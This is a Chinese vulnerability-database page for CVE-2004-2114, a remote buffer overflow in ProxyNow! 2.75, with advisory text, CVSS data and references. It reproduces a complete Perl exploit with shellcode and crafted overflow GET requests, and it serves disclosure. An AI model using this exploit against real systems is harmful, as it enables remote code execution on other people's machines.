CVE-2004-2114
CVSS10.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:06:28
NMCOES    

[原文]Stack-based and heap-based buffer overflows in ProxyNow! 2.75 and earlier allow remote attackers to execute arbitrary code via a GET request with a long ftp:// URL.


[CNNVD]InternetNow ProxyNow基于堆栈的缓冲区溢出漏洞(CNNVD-200412-754)

        
        ProxyNow!是一款提供多台电脑共享上网的系统。
        ProxyNow!对HTTP GET请求缺少充分的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        提交包含超长字符串的HTTP GET请求(包含' ftp:// '前缀)到服务器监听的3128 TCP端口,可触发基于堆的缓冲区溢出。另外由于'wsprintfA'调用对输入缺少充分边界检查,直接提交超长GET 请求也可以触发基于栈的溢出,精心构交数据可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:internetnow:proxynow:2.75
cpe:/a:internetnow:proxynow:2.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2114
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2114
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-754
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107515550931508&w=2
(UNKNOWN)  BUGTRAQ  20040126 ProxyNow! 2.x Multiple Overflow Vulnerabilities
http://www.securityfocus.com/bid/9500
(UNKNOWN)  BID  9500
http://xforce.iss.net/xforce/xfdb/14955
(UNKNOWN)  XF  proxynow-get-bo(14955)

- 漏洞信息

InternetNow ProxyNow基于堆栈的缓冲区溢出漏洞
危急 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        ProxyNow!是一款提供多台电脑共享上网的系统。
        ProxyNow!对HTTP GET请求缺少充分的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
        提交包含超长字符串的HTTP GET请求(包含' ftp:// '前缀)到服务器监听的3128 TCP端口,可触发基于堆的缓冲区溢出。另外由于'wsprintfA'调用对输入缺少充分边界检查,直接提交超长GET 请求也可以触发基于栈的溢出,精心构交数据可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        InternetNow
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.internetnow.com.my/

- 漏洞信息 (23608)

InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities (EDBID:23608)
windows remote
2004-01-26 Verified
0 Peter Winter-Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/9500/info

ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends a HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.

ProxyNow versions 2.75 and prior have been reported to be prone to these issues. 

#########################################################################
#!/usr/bin/perl -w
#
# Remote Stack Overflow in ProxyNow! 2.x PoC Exploit
#
# Tested on Windows XP Home SP1
#
# Ever seen notepad.exe with SYSTEM privileges? :-/
#
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
print "Usage: proxynow.pl <victim> <port>\n" .
       "\tDefault port is 3128\n\n";
exit;
}

print "Remote Stack Overflow in ProxyNow! PoC - Executes notepad.exe\n" .
      "Notepad.exe will only be visible from the Task Manager!\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on" .
                                   "port $ARGV[1]";

$nops      =            "\x90\x90\x90\x90";

$subcode   =            "\x89\xE0\x05\x03\xFF\xFF\xFF\xFF" .
                        "\xE0";

$shellcode =            "\x31\xC9\x51\x68\x65\x70\x61\x64" .
                        "\x68\xFF\x6E\x6F\x74\x8D\x44\x24" .
                        "\x01\x50\xB8\x44\x80\xC2\x77\xFF" .
                        "\xD0\xCC";

$pad = "XXXXXXXX";

$ebp = "BBBB";
$eip = "\x3B\x58\x01\x10";


$bad    = "GET ftp://www.nosite.com/" . "\x90"x33 . $shellcode . "a"x190 .
          $ebp . $eip . $nops . $subcode . $pad . "\x20HTTP/1.1\r\n\r\n";

print $victim $bad;

print "[+] Data sent: Check for notepad.exe running as SYSTEM!\n";

sleep(2);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################


		

- 漏洞信息

3723
ProxyNow! HTTP Request Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-01-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

InternetNow ProxyNow Multiple Stack and Heap Overflow Vulnerabilities
Boundary Condition Error 9500
Yes No
2004-01-26 12:00:00 2009-07-12 02:06:00
The disclosure of these issues has been credited to Peter Winter-Smith <peter4020@hotmail.com>.

- 受影响的程序版本

InternetNow ProxyNow 2.75
InternetNow ProxyNow 2.6

- 漏洞讨论

ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities present themselves when an attacker sends a HTTP GET request containing an excessively long URI to the server on TCP port 3128. The URI must be prefixed with the string 'ftp://'.

ProxyNow versions 2.75 and prior have been reported to be prone to these issues.

- 漏洞利用

The following proof of concept has been provided:
GET ftp://('a'x647)('AAAA')('XXXX') HTTP/1.1
GET ('ftp://www.example.com/')('a'x249)('BBBB')('XXXX') HTTP/1.1

The following exploit has been provided for the stack based buffer overflow issue:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站